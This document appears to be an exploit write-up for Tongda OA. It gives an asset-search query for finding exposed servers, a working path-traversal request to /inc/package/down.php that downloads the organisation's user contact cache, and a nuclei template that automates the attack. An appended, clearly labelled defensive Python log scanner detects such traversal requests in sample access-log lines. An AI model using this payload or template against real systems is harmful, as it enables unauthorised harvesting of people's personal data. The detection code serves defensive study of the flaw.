Vulnerability description

The down interface of Tongda OA (通达OA) can be used to download user contact information.

Asset search syntax

app="TDXK-通达OA"

Exploitation process

Login page

[Screenshot: login page (1701356187326.png)]

The down interface can be used to download user contact information.

http://xxxxx/inc/package/down.php?id=../../../cache/org

Response

[Screenshot: response (1701356345404.png)]

Download and view the obtained information

[Screenshot: downloaded file contents (1701356529286.png)]

nuclei template

id: Tongda-down-userinfo
info:
  name: Tongda-down-userinfo
  author: xxx
  severity: high
  description: description
  reference:
    - https://
  tags: Tongda
requests:
  - raw:
      - |+
        GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename
      - type: word
        part: header
        words:
          - '200'
      - type: status
        status:
          - 200
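Added example (not part of the original post, and not Tongda's or nuclei's code): a small access-log scanner for the defender side that flags requests to /inc/package/down.php whose id parameter escapes the package directory, covering plain, URL-encoded and double-encoded traversal and marking whether the server answered 200. The log lines, hosts and timestamps are constructed for the example; the log format is assumed to be the common Combined Log Format.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format); IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2023:14:16:27 +0800] "GET /inc/package/down.php?id=../../../cache/org HTTP/1.1" 200 18231 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Nov/2023:14:16:31 +0800] "GET /inc/package/down.php?id=..%2F..%2F..%2Fcache%2Forg HTTP/1.1" 200 18231 "-" "curl/8.0"
203.0.113.5 - - [30/Nov/2023:14:16:40 +0800] "GET /inc/package/down.php?id=%252e%252e%252f%252e%252e%252fcache%252forg HTTP/1.1" 200 18231 "-" "curl/8.0"
198.51.100.7 - - [30/Nov/2023:14:20:02 +0800] "GET /inc/package/down.php?id=20231130_report HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Nov/2023:14:21:10 +0800] "GET /general/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_package_dir(raw_id):
    """True if the decoded id resolves outside the package directory.
    Backslashes count as separators; normpath turns 'a/../../x' into '../x'."""
    decoded = fully_decode(raw_id).replace("\\", "/")
    normalized = posixpath.normpath(decoded)
    return normalized.startswith("/") or normalized == ".." or normalized.startswith("../")

def scan_access_log(text):
    """One record per down.php request whose id parameter is a traversal;
    'served' is True when the server answered 200, i.e. the file was returned."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/inc/package/down.php"):
            continue
        for raw_id in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if escapes_package_dir(raw_id):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "id": fully_decode(raw_id), "served": m.group("status") == "200"})
    return hits
```

Running scan_access_log(SAMPLE_LOG) returns the three traversal requests from 203.0.113.5, all served with 200; the legitimate package download and the unrelated request are ignored.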

Follow the WeChat official account "AY长歌" to learn more.